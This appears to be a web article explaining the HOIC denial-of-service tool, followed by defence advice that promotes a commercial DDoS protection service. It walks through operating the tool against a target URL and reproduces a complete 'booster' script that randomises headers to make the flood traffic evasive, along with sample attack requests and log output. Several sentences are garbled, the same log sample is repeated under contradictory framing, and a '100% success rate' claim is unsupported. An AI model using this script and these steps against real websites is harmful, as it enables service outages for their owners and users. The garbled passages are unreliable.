What is High Orbit Ion Cannon (HOIC)?

It makes use of custom scripts that makes the headers randomize, such as the user-agent, and introduce multiple attack targets. This gives users a level of privacy and helps them hide their geolocation. 

HOIC; was designed to be a standalone application. It has few features about limited coordination capabilities. It accepts only on mood (GUI mode). A standalone hacker can use it. However, 50 HOIC users are what is required to perform a DDoS attack. 

‍

What is High Orbit Ion Cannon (HOIC)?

High Orbit Ion Cannon (HOIC) is an advancement of the Low Orbit Ion Cannon (LOIC). Since LOIC had many limitations, a group called Anonymous created this open-source network (HOIC) to serve the same purpose but in a more secure way. denial of service (DoS) and distributed denial of service (DDoS) attacks. What it does is jam the target with HTTP GET and POST requests.

It offers precisely what Low Orbit Ion Cannon provides but in a better way. 

Some of the aspects HOIC is built to be better than LOIC includes:

• ‍Detection: It hides the location of the attacker. Lack of anonymity has been the most significant shortcoming of LOIC. Hence, HOIC utilizes booster scripts thaDenials users scatter attack traffic while protecting their location by protecting their IP. 
• ‍Firepower: With LOIC, individual users cannot launch high numbers of junks, it requires thousands of other users to join in the attack, but the HOIC, an individual can launch a significant attack. With just 50 other hackers, a DDoS attack can be carried out; this is almost impossible with the LOIC. 

The first time Anonymous carried out a HOIC attack was in 2012, the attack now known as Operation Megaupload. This attack held the record as the most significant DDoS assaults ever recorded. The attack was malicious and a strick back for the shutting down of Megaupload and illegal filesharing site. The attack targetted; U.S. Department of Justice, the Recording Industry Association of America, the Motion Picture Association of America and Broadcast Music, Inc.

Just like its predecessor, HOIC is freely distributed and ea; with use. This means anybody can gain access to the software, and it is relatively easy to use, with no knowledge at all, you can launch a deadly DDoS attack. The application allows users to open up to 256 simultaneous attack sessions at a go; this aids users in attacking their targets by continuously sending junk traffic till the target server gets jam and can no longer process legitimate requests. 

Despite these improvements, the HOIC cannot launch TCP and UDP floods; its attacks are carried out solely on HTTP GET and POST requests.

 The severity of attacks can be improved with an add-on script called Boosters; this feature is peculiar to HOIC alone. This application also allows its users to customize the application to suit their needs and even randomize assaults. 

Despite the liberty HOIC gives and booster use, a single individual can at most cause a significant blow to his target; there’s still a need for several hackers to team up to operate the HOIC simultaneously if they want to bring down the server. 

How HOIC works

Law enforcement has been closing down on most of the downloaded links; there’s still a way around it, so here's a dynamic analysis. 

HOIC Analysis

HOIC is primarily designed to be used on Windows devices; once on the platform, to carry out an attack, you target click on the + sign under Targets; you’ll get another pop-up box where you can input your targets information. 

You can then fill in the following target information:

URL: Put in the URL of the website you are targeting 

Power: You can customize the power to suit your needs. The default testing comes like this:

Low = ~2 requests/sec for each THREAD defined on the main GUI
Medium = ~4 requests/sec for each THREAD specified on the main GUI
High - ~8 requests/sec for each THREAD specified on the main GUI

‍Booster: These are add or configuration script that gives extra ferocity. 

Here is what the script looks like:

Dim user-agents() as String
Dim referers() as String
dim randheaders() as string
// EDIT THE FOLLOWING STRINGS TO MAKE YOUR OWN BOOST UNIQUE AND THEREFORE MORE EVASIVE!

// populate list

useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
useragents.Append "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
useragents.Append "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
useragents.Append "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
useragents.Append "Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 5.1; .NET CLR 1.1.4322)"
useragents.Append "Googlebot/2.1 ( http://www.googlebot.com/bot.html) "
useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14"
useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.600.0 Safari/534.14"
useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13"
useragents.Append "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Ubuntu/10.04 Chromium/9.0.595.0 Chrome/9.0.595.0 Safari/534.13"
useragents.Append "Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50727)"
useragents.Append "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; Media Center PC 4.0; SLCC1; .NET CLR 3.0.04320)"
useragents.Append "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; zh-cn) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5"
useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0 Safari/533.16"
useragents.Append "Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51"
useragents.Append "Mozilla/5.0 (Windows NT 5.1; U; Firefox/5.0; en; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.53"

// populate referer list

referers.Append "http://www.google.com/?q="+URL
referers.Append URL
referers.Append "http://www.google.com/"
referers.Append "http://www.yahoo.com/"

‍// Add random headers

randheaders.Append "Cache-Control: no-cache"
randheaders.Append "If-Modified-Since: Sat, 29 Oct 1994 11:59:59 GMT"
randheaders.Append "If-Modified-Since: Tue, 18 Aug 2007 12:54:49 GMT"
randheaders.Append "If-Modified-Since: Wed, 30 Jan 2000 01:21:09 GMT"
randheaders.Append "If-Modified-Since: Tue, 18 Aug 2009 08:49:15 GMT"
randheaders.Append "If-Modified-Since: Fri, 20 Oct 2006 09:34:27 GMT"
randheaders.Append "If-Modified-Since: Mon, 29 Oct 2007 11:59:59 GMT"
randheaders.Append "If-Modified-Since: Tue, 18 Aug 2003 12:54:49 GMT"

‍// ------------------ DO NOT EDIT BELOW THIS LINE

// generate random referer

Headers.Append "Referer: " + referers(RndNumber(0, referers.UBound))

// generate random user agent (DO NOT MODIFY THIS LINE)

Headers.Append "User-Agent: " + useragents(RndNumber(0, useragents.UBound))

// Generate random headers

Headers.Append randheaders(RndNumber(0, randheaders.UBound))

Once you are through, you click on the add button and you'll be taken back to the homepage. 

On the homepage, you can then customize the THREADS number (if you want to increase your attack velocity). Once you are all set and ready to launch the attack, click on the "FIRE TEH LAZER!" button. 

You'll see HTTP requests that look like this:

webserver

GET / HTTP/1.0Accept: */*Accept-Language: enHost: www.hoic_target_site.com

If the target; its server was Apache, for example, access_log entries would look like this:

72.192.214.223 - - [27/Jan/2012:08:57:59 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"72.192.214.223 - - [27/Jan/2012:08:57:59 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"72.192.214.223 - - [27/Jan/2012:08:58:00 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"72.192.214.223 - - [27/Jan/2012:08:58:00 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"72.192.214.223 - - [27/Jan/2012:08:58:00 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"72.192.214.223 - - [27/Jan/2012:08:58:00 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"72.192.214.223 - - [27/Jan/2012:08:58:00 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"72.192.214.223 - - [27/Jan/2012:08:58:00 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"72.192.214.223 - - [27/Jan/2012:08:58:01 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"72.192.214.223 - - [27/Jan/2012:08:58:01 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"72.192.214.223 - - [27/Jan/2012:08:58:01 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"72.192.214.223 - - [27/Jan/2012:08:58:01 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"72.192.214.223 - - [27/Jan/2012:08:58:02 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"72.192.214.223 - - [27/Jan/2012:08:58:02 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"72.192.214.223 - - [27/Jan/2012:08:58:02 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"72.192.214.223 - - [27/Jan/2012:08:58:02 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"72.192.214.223 - - [27/Jan/2012:08:58:02 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"72.192.214.223 - - [27/Jan/2012:08:58:02 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"72.192.214.223 - - [27/Jan/2012:08:58:03 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"72.192.214.223 - - [27/Jan/2012:08:58:03 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"

However, if you are targeting an Apache web server, it would probably look like this. 

72.192.214.223 - - [27/Jan/2012:08:57:59 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"72.192.214.223 - - [27/Jan/2012:08:57:59 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"72.192.214.223 - - [27/Jan/2012:08:58:00 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"72.192.214.223 - - [27/Jan/2012:08:58:00 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"72.192.214.223 - - [27/Jan/2012:08:58:00 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"72.192.214.223 - - [27/Jan/2012:08:58:00 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"72.192.214.223 - - [27/Jan/2012:08:58:00 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"72.192.214.223 - - [27/Jan/2012:08:58:00 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"72.192.214.223 - - [27/Jan/2012:08:58:01 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"72.192.214.223 - - [27/Jan/2012:08:58:01 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"72.192.214.223 - - [27/Jan/2012:08:58:01 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"72.192.214.223 - - [27/Jan/2012:08:58:01 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"72.192.214.223 - - [27/Jan/2012:08:58:02 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"72.192.214.223 - - [27/Jan/2012:08:58:02 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"72.192.214.223 - - [27/Jan/2012:08:58:02 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"72.192.214.223 - - [27/Jan/2012:08:58:02 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"72.192.214.223 - - [27/Jan/2012:08:58:02 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"72.192.214.223 - - [27/Jan/2012:08:58:02 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"72.192.214.223 - - [27/Jan/2012:08:58:03 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"72.192.214.223 - - [27/Jan/2012:08:58:03 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"

‍

How Can I Protect Myself Against HOIC?

HOIC is more deceptive than the older LOIC and it has better protection that gives it a degree of anonymity, it's also more difficult to identify its attack and block DDoS attacks.

When it comes to HOIC attacks, you have to go the extra mile to protect your site because even websites that are seemingly secured still fall victims. Web/network vulnerability scanners have little use in this case. Also, since HOIC randomizes headers, it becomes almost impossible for web application firewalls (WAF) to detect HOIC attacks. So what's the way out? 

I'll advise you to use the intrusion detection systems (IDS) or intrusion prevention systems (IPS).

Al using locally installed tools can also come in handy. With these tools, you stand a good chance of withstanding DDoS attacks. This is probably the reason why organizations opt for virtual cloud hosting to host their website because a good cloud is equipped to protect their client’s websites, not just equipped with the tools but also sheer bandwidth capabilities.

You can also give Imperva Website DDoS Protection a try; it helps you protect from application-layer DDoS attacks, including HTTP/S floods originating from HOIC nodes. Imperva Website DDoS Protection secures comes with a DNS redirection intervene on traffic before they get to your site and analyze all requests and filter our suspicious requests before they reach your network.

Imperva Website DDoS Protection enjoys a success rate of 100%. Its Imperva traffic inspection technology allows it to identify and block all suspicious requests giving way for only legitimate ones. As a bonus, the Imperva content delivery network (CDN) helps you enjoy a relaxed user experience and reduced bandwidth consumption.

Conclusion 

As a website owner, expect attack on your website from time to time, so you have to be prepared always, since anyone can access the HOIC platform to attack your site. 

Attacks from HOIC is difficult to detect, the best way to stay safe is to contact your service provider, don't wait until you are threatened before you reach out to them. Most service providers have what it takes to keep you safe.